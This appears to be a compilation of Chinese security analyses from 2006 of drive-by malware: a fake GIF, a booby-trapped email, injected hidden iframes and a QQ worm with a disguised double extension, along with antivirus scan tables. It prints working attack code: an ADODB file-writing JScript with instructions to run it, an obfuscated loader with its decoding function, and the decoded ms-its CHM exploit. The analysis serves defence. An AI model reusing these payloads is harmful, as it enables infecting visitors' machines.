【火影】我爱罗 - 2006-5-2 4:58:00
冒充GIF文件,下载运行1.js。
1.js其实是个CHM文件,会释放/运行.exe文件。Kaspersky报为Trojan-Downloader.Win32.Delf.aet,瑞星报为Trojan.DL.Small.hm。
File: 1.js
Status: INFECTED/MALWARE
MD5 617449ed78325096128e604f1e9f9d30
Packers detected: -
Scanner results
AntiVir Found Heuristic/Trojan.Downloader (probable variant)
ArcaVir Found Trojan.Downloader.Delf.Aet
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found Trojan.Html.Gamect.A, Trojan.Downloader.Delf.AET
ClamAV Found Exploit.HTML.ObjCode-2
Dr.Web Found Exploit.CodeBase, Trojan.DownLoader.6966
F-Prot Antivirus Found HTML/ObjCode@expl
Fortinet Found nothing
Kaspersky Anti-Virus Found Trojan-Downloader.Win32.Delf.aet
NOD32 Found Win32/TrojanDownloader.Small.AAO, Win32/TrojanDownloader.Delf.AET
Norman Virus Control Found nothing
UNA Found nothing
VirusBuster Found nothing
VBA32 Found Trojan-Downloader.Win32.Delf.aet
对 发现一个使用技术升级、下载灰鸽子的网站 中的恶意文件young.gif进行了分析和注释,收获颇多。其一便是利用ADODB写文件。
下面的代码是从young.gif中截取、修改的,用来写入文件c:\boot.hta。
--------------------------------------------------------------------------------
<html>
<HEAD></HEAD>
</HTML>
<SCRIPT language=JScript>
try
{
var strHello = "hello";
//利用ADODB写文件
Rfuc1k1S=new ActiveXObject("ADODB.Recordset");
Rfuc1k1S.Fields.Append("love", 200, 3000);
mike=1;
Rfuc1k1S.Open();
mike=1;
Rfuc1k1S.AddNew();
mike=1;
Rfuc1k1S.Fields("love").Value = strHello;
}
catch(e)
{}
Rfuc1k1S.Update();
try
{
Rfuc1k1S.Save("c:\\boot.hta" ,0); //保存为c:\boot.hta
}
catch(e)
{}
</SCRIPT>
</BODY>
</HTML>
--------------------------------------------------------------------------------
把它复制/粘贴到记事本里,保存为HTM文件,双击运行。
看看c:\boot.hta是否出来了?
摘要:网站首页被插入恶意代码:<iframe src='hxxp://www.***hyap98.com/123/wawa.htm' width='0' height='0' frameborder='0'></iframe><iframe src='hxxp://djloveqq.***go3.icpcn.com/cert/joke.htm' width='0' height='0' frameborder='0'></iframe>第2版 分析young.gif,确认young.css为灰鸽子今天收到一封带毒邮件。这封带毒邮件与2005年末收的的带毒邮件(可参考:收到带病毒的电子邮件.... )相似,但有所翻新。
主题:最近好吗?怎么联系不上你
发件人: "zxc338855" zxc338855@163.com
邮件内容为:
老大最近怎么老是找不到你,你倒低跑那里去!打你电话也老是关机! 发短消息给你你也不回!发电子邮件估计你也没看!如果你看到这封信 打个电话给我!我有事找你!对了你QQ是不是换了啊!还是被人黑了!你原来那个QQ的人老是骂我!而且很恶心!我怀疑不是你!如过你QQ被黑了我这还有几个QQ可以送你!但是你要请客!不和你说了,有时间一定要和我联系!不要忘了 老大最近怎么老是找不到你,你倒低跑那里去!打你电话也老是关机! 发短消息给你你也不回!发电子邮件估计你也没看!如果你看到这封信 打个电话给我!我有事找你!对了你QQ是不是换了啊!还是被人黑了!你原来那个QQ的人老是骂我!而且很恶心!我怀疑不是你!如过你QQ被黑了我这还有几个QQ可以送你!但是你要请客!不和你说了,有时间一定要和我联系!不要忘了
邮件体中其中用<IFRAME>引入了下载病毒的网页hxxp://2008.***e2.7868.net/service/bj/a.htm。
hxxp://2008.***e2.7868.net/service/bj/a.htm的内容为:
--------------------------------------------------------------------------------
<SCRIPT LANGUAGE="JavaScript">
<!--
var HtmlStrings=["=TDSJQU�>wbs!Xpset>#&4Dcpez!podpoufyunfov&4E&33sfuvso!gbmtf&33!p","oesbhtubsu&4E&33sfuvso!gbmtf&33!potfmfdutubsu!&4E&33sfuvso!gb","mtf&33!potfmfdu&4E&33epdvnfou&3Ftfmfdujpo&3Ffnquz&39&3:&33!po","dpqz&4E&33epdvnfou&3Ftfmfdujpo&3Ffnquz&39&3:&33!pocfgpsfdpqz&","4E&33sfuvso!gbmtf&33!ponpvtfvq&4E&33epdvnfou&3Ftfmfdujpo&3Ffn","quz&39&3:&33&4F&4Doptdsjqu&4F&4Djgsbnf!tsd&4E&3B&4F&4D&3Gjgsb","nf&4F&4D&3Goptdsjqu&4F&1E&1B&4Dufyubsfb!je&4E&33dpef&33!tuzmf","&4E&33ejtqmbz&4Bopof&4C&33&4F&1E&1B&4Dpckfdu!ebub&4E&33&37&34","21:&4Ct&3Ejut&4Bniunm&4Bgjmf&4B&3G&3Gd&4B&6Dgpp&3Fniu&32&35&8","Cqbui&8E&3Gb&3Fdin&4B&4B&3Gb&3Fiun&33!uzqf&4E&33ufyu&3Gy&3Etd","sjqumfu&33&4F&1E&1B&4D&3Gpckfdu&4F&1E&1B&4D&3Gufyubsfb&4F&1E&","1B&4Dtdsjqu!mbohvbhf&4E&33kbwbtdsjqu&33&4F&1E&1Bepdvnfou&3Fxs","juf&39dpef&3Fwbmvf&3Fsfqmbdf&39&3G&6D&35&8Cqbui&8E&3Gh&3Dmpdb","ujpo&3Fisfg&3Ftvctusjoh&391&3Dmpdbujpo&3Fisfg&3FjoefyPg&39&38","b&3Fiun&38&3:&3:&3:&3:&4C&1E&1B&4D&3Gtdsjqu&4F&1E&1B#<epdvnfo","u/xsjuf)voftdbqf)Xpset**=0TDSJQU�>� "];
function psw(st){
var varS;
varS="";
var i;
for(var a=0;a<st.length;a++){
i = st.charCodeAt(a);
if (i==1)
varS=varS+String.fromCharCode('"'.charCodeAt()-1);
else if (i==2) {
a++;
varS+=String.fromCharCode(st.charCodeAt(a));
}
else
varS+=String.fromCharCode(i-1);
}
return varS;
};
var num=16;
function S(){
for(i=0;i<num;i++)
document.write(psw(HtmlStrings));}
S();
// -->
</SCRIPT>
--------------------------------------------------------------------------------
用了一个自定义的加密函数来加密。
解密后的代码为:
--------------------------------------------------------------------------------
<SCRIPT>var Words="%3Cbody oncontextmenu%3D%22return false%22 ondragstart%3D%22return false%22 onselectstart %3D%22return false%22 onselect%3D%22document%2Eselection%2Eempty%28%29%22 oncopy%3D%22document%2Eselection%2Eempty%28%29%22 onbeforecopy%3D%22return false%22 onmouseup%3D%22document%2Eselection%2Eempty%28%29%22%3E%3Cnoscript%3E%3Ciframe src%3D%2A%3E%3C%2Fiframe%3E%3C%2Fnoscript%3E%0D%0A%3Ctextarea id%3D%22code%22 style%3D%22display%3Anone%3B%22%3E%0D%0A%3Cobject data%3D%22%26%23109%3Bs%2Dits%3Amhtml%3Afile%3A%2F%2Fc%3A%5Cfoo%2Emht%21%24%7Bpath%7D%2Fa%2Echm%3A%3A%2Fa%2Ehtm%22 type%3D%22text%2Fx%2Dscriptlet%22%3E%0D%0A%3C%2Fobject%3E%0D%0A%3C%2Ftextarea%3E%0D%0A%3Cscript language%3D%22javascript%22%3E%0D%0Adocument%2Ewrite%28code%2Evalue%2Ereplace%28%2F%5C%24%7Bpath%7D%2Fg%2Clocation%2Ehref%2Esubstring%280%2Clocation%2Ehref%2EindexOf%28%27a%2Ehtm%27%29%29%29%29%3B%0D%0A%3C%2Fscript%3E%0D%0A";document.write(unescape(Words))</SCRIPT>
--------------------------------------------------------------------------------
unescape后的代码为:
--------------------------------------------------------------------------------
<body oncontextmenu="return false" ondragstart="return false" onselectstart ="return false" onselect="document.selection.empty()" oncopy="document.selection.empty()" onbeforecopy="return false" onmouseup="document.selection.empty()"><noscript><iframe src=*></iframe></noscript>
<textarea id="code" style="display:none;">
<object data="ms-its:mhtml:file://c:\foo.mht!${path}/a.chm::/a.htm" type="text/x-scriptlet">
</object>
</textarea>
<script language="javascript">
document.write(code.value.replace(/\${path}/g,location.href.substring(0,location.href.indexOf('a.htm'))));
</script>
--------------------------------------------------------------------------------
该网页会下载、运行a.chm。
a.chm会释放/运行a.htm和a.exe,Kaspersky报为Exploit.HTML.CodeBaseExec和Trojan-Dropper.Win32.Pakes,瑞星报为Exploit.HTML.CodeExec和Trojan.PcGhost.c。
QQ传来的文件是:元旦快乐.ZIP,其中的文件是
--------------------------------------------------------------------------------
元旦快乐.jpg .exe
--------------------------------------------------------------------------------
文件图标为MM的头像,文件名中的.jpg和文件的扩展名.exe前面加上了许多空格,很容易让人以为是一个JPG图片文件。
瑞星报为Worm.QQ.TopFox.aq
Kaspersky 5在QQ中接收文件时不报,手动扫描或解压时才报为:Trojan.Win32.VB.aha。
File: 元旦快乐.zip
Status: INFECTED/MALWARE
MD5 d7958247cf08ab13a22c0b137e8c9cca
Packers detected: Analyzing...
Scanner results
AntiVir Found Trojan/TopFox.A
ArcaVir Found Trojan.Vb.Aha
Avast Found Win32:Trojan-gen. {Other}
AVG Antivirus Found Generic.MHL
BitDefender Found Trojan.Vb.AHA
ClamAV Found nothing
Dr.Web Found Trojan.Topfox
F-Prot Antivirus Found nothing
Fortinet Found W32/QQLove.A-pws
Kaspersky Anti-Virus Found Trojan.Win32.VB.aha
NOD32 Found probably unknown NewHeur_PE (probable variant)
Norman Virus Control Found W32/VBTroj.TT
UNA Found nothing
VirusBuster Found Trojan.VB.EDK
VBA32 Found Trojan.Win32.VB.aha
This is a report processed by VirusTotal on 04/03/2006 at 11:59:44 (CET) after scanning the file "__25968" file.
Antivirus Version Update Result
AntiVir 6.34.0.14 04.03.2006 TR/TopFox.A
Avast 4.6.695.0 04.03.2006 Win32:Trojan-gen. {Other}
AVG 386 03.31.2006 Generic.MHL
Avira 6.34.0.54 04.03.2006 TR/TopFox.A
BitDefender 7.2 04.03.2006 Trojan.Vb.AHA
CAT-QuickHeal 8.00 03.31.2006 Trojan.VB.aha
ClamAV devel-20060202 04.03.2006 no virus found
DrWeb 4.33 04.03.2006 Trojan.Topfox
eTrust-InoculateIT 23.71.118 04.02.2006 Win32/SillyDL.21652!Trojan
eTrust-Vet 12.4.2146 04.03.2006 no virus found
Ewido 3.5 04.03.2006 Trojan.VB.aha
Fortinet 2.71.0.0 04.03.2006 W32/QQLove.A-pws
F-Prot 3.16c 03.30.2006 no virus found
Ikarus 0.2.59.0 04.01.2006 Win32.HLLW.Imkill
Kaspersky 4.0.2.24 04.03.2006 Trojan.Win32.VB.aha
McAfee 4731 03.31.2006 Generic Malware.a!zip
NOD32v2 1.1467 04.02.2006 probably unknown NewHeur_PE virus
Norman 5.70.10 03.31.2006 W32/VBTroj.TT
Panda 9.0.0.4 04.02.2006 Trj/Qeds.F
Sophos 4.04.0 04.03.2006 no virus found
Symantec 8.0 04.03.2006 Trojan Horse
TheHacker 5.9.7.124 04.03.2006 W32/Generic!zip-dobleextension
UNA 1.83 03.30.2006 Trojan.Win32.VB
VBA32 3.10.5 04.03.2006 Trojan.Win32.VB.aha
© 2000 - 2025 Rising Corp. Ltd.